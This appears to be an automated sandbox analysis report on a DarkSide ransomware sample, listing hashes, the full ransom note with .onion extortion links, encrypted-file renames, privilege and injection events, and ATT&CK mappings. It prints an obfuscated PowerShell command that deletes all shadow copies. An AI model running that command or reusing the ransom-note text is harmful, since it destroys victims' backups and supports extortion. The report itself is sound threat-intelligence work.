darkside | 6931b124d38d52bd7cdef48121fda457d407b63b59bb4e6ead4ce548f4bbb971

General

Target

3.exe
Size

17KB
MD5

9009593ebf5ea20407ab19bff045dc9d
SHA1

03c1f7458f3983c03a0f8124a01891242c3cc5df
SHA256

6931b124d38d52bd7cdef48121fda457d407b63b59bb4e6ead4ce548f4bbb971
SHA512

fe24a401b35a5b1874bc90739f6fda1969456a13e1339f5b920e6fa659e82df0febc7fc3196ea854601e8773c356884a2516b660daafa944c3643b9d0be74fed

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\\README.137cb6d5.TXT

Family

darkside

Ransom Note

----------- [ Welcome to Dark ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 100 GB data. Example of data: - Accounting data - Executive data - Sales data - Customer Support data - Marketing data - Quality data - And more other... Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To give you universal decrypting tool for all encrypted files. - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68 When you open our website, put the following data in the input form: Key: pr9gzRnMz6qEwr6ovMT0cbjd9yT56NctfQZGIiVVLgo0ME2EQpAUyZucG9BLrOJjno5XLPvCN11TFfnlFHa42u5mJxoeR5k5RUgQAC1MC6LBUj4YOOAUyiBrR HQSUM3pzGoEPRVOzXSZ8YqkJyFL0TDFBbWaBKQDOSo9GzKKoVRQ0Eb02F5geTPkTAqZZSfSQ6PBBlTGPSgGe2kCyuwwp7lDmRSJlNnHssMMZHVhXzyZ6fxiBY gNiuusFK8JNI5nrtRPp3bMAc6OEddxfJWj6o2GT1Xg9j87Jp4Oyv43E1J61jLJAWBkmoBB3Gqv07mtyDW5PnmxBlNzABbLFEvJMQL23sR8nnw4svzcZHxrqD1 xRcxqyeKtsaQ5yqLvyQgMdnrI2QoCqkHYYUfBIzjO8BXyBZdmjHanXE57jdDAhjaDUUqfL917cCyJr1uwVR0Xj5lJXe8BIKHd3dFrz70CsIXFAhicOsBlFzIn daNcAXXyL8Fg1avIXOcuEkGRDXt8Cs8b3TAB6n4DrbLJdiFjECo8yCA9pxvzqjXatumUloblWFZaUoLVYzP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC

http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside

Modifies extensions of user files 13 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

3.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\EditCompress.raw => C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5	3.exe
File opened for modification	C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5	3.exe
File renamed	C:\Users\Admin\Pictures\LimitRepair.tif => C:\Users\Admin\Pictures\LimitRepair.tif.137cb6d5	3.exe
File opened for modification	C:\Users\Admin\Pictures\LimitRepair.tif.137cb6d5	3.exe
File renamed	C:\Users\Admin\Pictures\SelectMount.png => C:\Users\Admin\Pictures\SelectMount.png.137cb6d5	3.exe
File opened for modification	C:\Users\Admin\Pictures\StepCompress.tif.137cb6d5	3.exe
File renamed	C:\Users\Admin\Pictures\ResetUnpublish.crw => C:\Users\Admin\Pictures\ResetUnpublish.crw.137cb6d5	3.exe
File opened for modification	C:\Users\Admin\Pictures\ResetUnpublish.crw.137cb6d5	3.exe
File opened for modification	C:\Users\Admin\Pictures\SelectMount.png.137cb6d5	3.exe
File renamed	C:\Users\Admin\Pictures\StepCompress.tif => C:\Users\Admin\Pictures\StepCompress.tif.137cb6d5	3.exe
File opened for modification	C:\Users\Admin\Pictures\SubmitDismount.tiff	3.exe
File renamed	C:\Users\Admin\Pictures\SubmitDismount.tiff => C:\Users\Admin\Pictures\SubmitDismount.tiff.137cb6d5	3.exe
File opened for modification	C:\Users\Admin\Pictures\SubmitDismount.tiff.137cb6d5	3.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

3.exepowershell.exe

pid process

1776 3.exe
1776 3.exe
2028 powershell.exe
2028 powershell.exe
1776 3.exe

pid	process
1776	3.exe
1776	3.exe
2028	powershell.exe
2028	powershell.exe
1776	3.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

3.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1776	3.exe
Token: SeSecurityPrivilege	1776	3.exe
Token: SeTakeOwnershipPrivilege	1776	3.exe
Token: SeLoadDriverPrivilege	1776	3.exe
Token: SeSystemProfilePrivilege	1776	3.exe
Token: SeSystemtimePrivilege	1776	3.exe
Token: SeProfSingleProcessPrivilege	1776	3.exe
Token: SeIncBasePriorityPrivilege	1776	3.exe
Token: SeCreatePagefilePrivilege	1776	3.exe
Token: SeBackupPrivilege	1776	3.exe
Token: SeRestorePrivilege	1776	3.exe
Token: SeShutdownPrivilege	1776	3.exe
Token: SeDebugPrivilege	1776	3.exe
Token: SeSystemEnvironmentPrivilege	1776	3.exe
Token: SeRemoteShutdownPrivilege	1776	3.exe
Token: SeUndockPrivilege	1776	3.exe
Token: SeManageVolumePrivilege	1776	3.exe
Token: 33	1776	3.exe
Token: 34	1776	3.exe
Token: 35	1776	3.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeBackupPrivilege	608	vssvc.exe
Token: SeRestorePrivilege	608	vssvc.exe
Token: SeAuditPrivilege	608	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

3.exe

description	pid	process	target process
PID 1776 wrote to memory of 2028	1776	3.exe	powershell.exe
PID 1776 wrote to memory of 2028	1776	3.exe	powershell.exe
PID 1776 wrote to memory of 2028	1776	3.exe	powershell.exe
PID 1776 wrote to memory of 2028	1776	3.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\3.exe
"C:\Users\Admin\AppData\Local\Temp\3.exe"
1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:608

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
a7ea159d46d4f2d8675989b9f003699a

SHA1
badc98a42d75c950d28462a188ca3ad60bf55aa6

SHA256
8cc444f73292cdb14bb025a73edb2463a663845f458cc57447e336cdd3f5f77b

SHA512
4a7eeea095610fc5569f825bb7c07c2bda4e9e8f9f37be817ef12fb85c1cd232bb97f6a0485c7ffc15bb32aa367894c9b4346a278bdce1434c0977f404ab2249

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
48a82b6753094950d9d3eacb72054bea

SHA1
375ce7b97c9e51c022124c50b724fc3fd7c418ea

SHA256
0cf4c9486a6b66bbede503837ab66024587ab3d556508918706320b59b2d32df

SHA512
8d755fb2ca1a4461ba3dc4186dba4bd230a3035b1319e96ab5d0647337bbe27b1414fa04a6342a031334cfa0206062a80e632fc5e3c118f1b3bc10e5951a558f

Download Submit
memory/1776-60-0x0000000075C31000-0x0000000075C33000-memory.dmp

Filesize
8KB

Download
memory/2028-66-0x000000001AB50000-0x000000001AB52000-memory.dmp

Filesize
8KB

Download
memory/2028-64-0x000000001ABD0000-0x000000001ABD1000-memory.dmp

Filesize
4KB

Download
memory/2028-65-0x0000000002530000-0x0000000002531000-memory.dmp

Filesize
4KB

Download
memory/2028-63-0x00000000023E0000-0x00000000023E1000-memory.dmp

Filesize
4KB

Download
memory/2028-67-0x000000001AB54000-0x000000001AB56000-memory.dmp

Filesize
8KB

Download
memory/2028-68-0x0000000002560000-0x0000000002561000-memory.dmp

Filesize
4KB

Download
memory/2028-69-0x000000001C4A0000-0x000000001C4A1000-memory.dmp

Filesize
4KB

Download
memory/2028-70-0x000000001B980000-0x000000001B981000-memory.dmp

Filesize
4KB

Download
memory/2028-62-0x000007FEFBB31000-0x000007FEFBB33000-memory.dmp

Filesize
8KB

Download
memory/2028-61-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads